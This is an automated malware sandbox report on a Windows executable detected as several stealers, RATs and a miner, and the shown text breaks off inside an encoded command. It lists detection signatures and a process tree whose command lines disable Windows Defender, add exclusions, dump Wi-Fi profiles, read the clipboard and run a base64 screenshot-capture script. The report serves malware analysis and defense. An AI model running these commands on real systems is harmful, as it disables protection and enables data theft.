Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VaTlw2kNGc.exe

Overview

General Information

Sample name:VaTlw2kNGc.exe
renamed because original name is a hash value
Original sample name:21dd41d299117fe5c556afc317f9fcbf.exe
Analysis ID:1486327
MD5:21dd41d299117fe5c556afc317f9fcbf
SHA1:059dc993dace11614e1077fb0eb36c602ff347f1
SHA256:a4cf3adaa9f44653f7bad93cbaebf994f398ccabf64e968b421266a7882b9a63
Tags:BlankGrabberexe
Infos:

Detection

Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Stop multiple services
Yara detected Blank Grabber
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected Telegram RAT
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executable to a common third party application directory
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Binaries Write Suspicious Extensions
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • VaTlw2kNGc.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\VaTlw2kNGc.exe" MD5: 21DD41D299117FE5C556AFC317F9FCBF)
    • VaTlw2kNGc.exe (PID: 6520 cmdline: "C:\Users\user\Desktop\VaTlw2kNGc.exe" MD5: 21DD41D299117FE5C556AFC317F9FCBF)
      • cmd.exe (PID: 1700 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Build.exe (PID: 5840 cmdline: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym MD5: 4FEC8FAF6590F62034AD44A54175B9E9)
          • hacn.exe (PID: 2676 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: FC445049713C02F9A9DDAA62E404C9E9)
            • hacn.exe (PID: 6584 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: FC445049713C02F9A9DDAA62E404C9E9)
              • cmd.exe (PID: 6256 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • s.exe (PID: 7204 cmdline: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym MD5: E5DB23B3AAF4DDDD2BAF96FB7BBA9616)
                  • svchost.exe (PID: 7268 cmdline: "C:\ProgramData\svchost.exe" MD5: 45C59202DCE8ED255B4DBD8BA74C630F)
                    • wscript.exe (PID: 7500 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
                      • cmd.exe (PID: 8188 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                        • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • ChainComServermonitor.exe (PID: 8024 cmdline: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe" MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)
                          • csc.exe (PID: 9108 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                            • conhost.exe (PID: 9124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                            • cvtres.exe (PID: 9164 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES541F.tmp" "c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
                  • setup.exe (PID: 7288 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)
          • based.exe (PID: 1700 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 838A5BD59DE32F425938CBA6C119CBEE)
        • based.exe (PID: 6900 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 838A5BD59DE32F425938CBA6C119CBEE)
          • cmd.exe (PID: 7296 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7536 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7304 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7440 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7344 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7512 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 7468 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7824 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 648 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 6760 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 7408 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7240 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7996 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7208 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 8048 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 7244 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 8076 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 8260 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • cmd.exe (PID: 7892 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • systeminfo.exe (PID: 8340 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • cmd.exe (PID: 7276 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 8308 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 8232 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 8412 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhA